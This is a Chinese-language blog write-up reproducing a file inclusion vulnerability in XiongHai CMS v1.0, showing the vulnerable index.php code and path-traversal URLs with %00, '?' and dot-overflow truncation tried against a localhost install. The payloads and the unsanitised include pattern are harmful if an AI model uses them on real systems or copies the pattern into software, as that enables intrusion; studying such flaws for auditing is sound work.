代码审计:熊海cms 首页文件包含漏洞复现

代码审计:熊海cms 首页文件包含漏洞复现

  • 熊海cms
  • 代码审计
  • 漏洞复现

熊海cms

熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。
适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。
复现版本为 熊海CMS_V1.0 版本,各位可自行下载。

代码审计

先使用Seay工具审计一波,根据关键代码回溯。
代码审计:熊海cms 首页文件包含漏洞复现_第1张图片
工具显示index.php中文件包含函数存在变量,存在漏洞。
具体代码如下:


	//单一入口模式
	error_reporting(0); //关闭错误显示
	$file=addslashes($_GET['r']); //接收文件名
	$action=$file==''?'index':$file; //判断为空或者等于index
	include('files/'.$action.'.php'); //载入相应文件
?>

这是个很典型的文件包含漏洞,接受r参数,r不为空则带入包含文件。

漏洞复现

在根目录下存放一个测试文件1.php。
代码审计:熊海cms 首页文件包含漏洞复现_第2张图片
利用漏洞包含文件。

%00截断,失败
http://localhost/xionghai_v1.0/index.php?r=../1.php%00
?号截断,失败
http://localhost/xionghai_v1.0/index.php?r=../1.php?
.溢出截断,成功
http://localhost/xionghai_v1.0/index.php?r=../1.php........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

代码审计:熊海cms 首页文件包含漏洞复现_第3张图片

你可能感兴趣的:(代码审计,php,web,安全漏洞)